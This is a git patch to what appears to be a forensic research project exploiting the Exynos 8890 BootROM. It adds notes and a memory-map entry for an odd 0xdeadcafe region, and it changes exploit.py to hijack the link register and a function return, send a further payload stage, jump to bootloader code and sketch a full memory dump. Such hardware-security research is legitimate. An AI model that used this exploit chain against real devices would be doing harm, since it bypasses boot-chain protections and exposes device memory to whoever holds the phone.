From fe58a3b869924c0f4c1d62dc18474aef3ba22b8c Mon Sep 17 00:00:00 2001
From: Jonathan Herrewijnen <j.herrewijnen@nfi.nl>
Date: Mon, 16 Sep 2024 17:14:14 +0200
Subject: [PATCH] reads B33

---
 documentation/source/BootROM_8890/04_notes.rst     |  6 ++++++
 .../source/_ignore/stack_and_functions.csv         |  3 ++-
 source/exploit/exploit.py                          | 14 +++++++++++++-
 3 files changed, 21 insertions(+), 2 deletions(-)

diff --git a/documentation/source/BootROM_8890/04_notes.rst b/documentation/source/BootROM_8890/04_notes.rst
index ba5b5bb..aa16e3e 100644
--- a/documentation/source/BootROM_8890/04_notes.rst
+++ b/documentation/source/BootROM_8890/04_notes.rst
@@ -207,3 +207,9 @@ Current EL: 0xc
 
 The debugger at 0x11200000 can only dump 0x768 at a time (its space related. Before BL31 this is also an issue.).   
 
+There's an odd space at 0x14kk. With things like deadcafe:
+
+.. code::
+
+        1c0000000000000000000000fecaadde00000000fecaaddefecaaddefecaaddefecaaddefecaaddefecaaddefecaaddefecaaddefecaaddefecaaddefecaaddefecaaddefecaaddefecaaddefecaaddefecaaddefecaaddefecaaddefecaaddefecaaddefecaaddefecaaddef
+
diff --git a/documentation/source/_ignore/stack_and_functions.csv b/documentation/source/_ignore/stack_and_functions.csv
index 51ba7c9..4556723 100644
--- a/documentation/source/_ignore/stack_and_functions.csv
+++ b/documentation/source/_ignore/stack_and_functions.csv
@@ -17,4 +17,5 @@ start,end,name,order,comment,X0,LR
 0x14AC0000,0x14ac5000,mali@14AC0000,,,,
 0x02035600,0x02035608,TTBR0_EL3,,,,
 0x11200000,0x11207000,Last relocated debugger,,,,
-0xa0000000,0xa0013fff,Parts of BL2 in IMEM,,,,
\ No newline at end of file
+0xa0000000,0xa0013fff,Parts of BL2 in IMEM,,,,
+0x14000000,1400060000,DEADCAFE,,,,
\ No newline at end of file
diff --git a/source/exploit/exploit.py b/source/exploit/exploit.py
index 7fbe2c2..ac9e47a 100644
--- a/source/exploit/exploit.py
+++ b/source/exploit/exploit.py
@@ -772,10 +772,12 @@ class ExynosDevice():
         print(f'Current EL: {hex(self.cd.arch_dbg.state.CURRENT_EL)}')
 
         # Restore bootflow
+        BL33_jump = self.cd.arch_dbg.state.X0
+        self.cd.arch_dbg.state.LR = DEBUGGER_ADDR
         # self.cd.memwrite_region(0x020200dc, p32(hijacked_fun))
         
         # Disable this to keep access to the debugger after senindg the next stage
-        # self.cd.restore_stack_and_jump(hijacked_fun)
+        self.cd.restore_stack_and_jump(hijacked_fun)
 
         # ==== Stage 5  ====
         #self.cd.memwrite_region(0x020200dc, p32(hijacked_fun))
@@ -790,6 +792,10 @@ class ExynosDevice():
         # assert len(stage4) == stage4_len, "Invalid stage4 length"
 
         self.send_normal_stage(stage4)
+        self.connect_device()
+        self.usb_read(0x200) # GiAs
+        self.cd.arch_dbg.X0 = BL33_jump
+        self.cd.jump_to(0x8f000000)
 
         # TRYOUT PATCHING BL33
         # BL1 is loaded, now authenticate and patch it
@@ -812,6 +818,12 @@ class ExynosDevice():
 
         time.sleep(2)
 
+        # # dump in stages of 100 000 bytes and append to dump
+        # dump = b""
+        # for i in range(0x80000000, 0xf0000000, 0x100000):
+        #     dump += self.cd.memdump_region(i, 0x100000)
+
+
         pass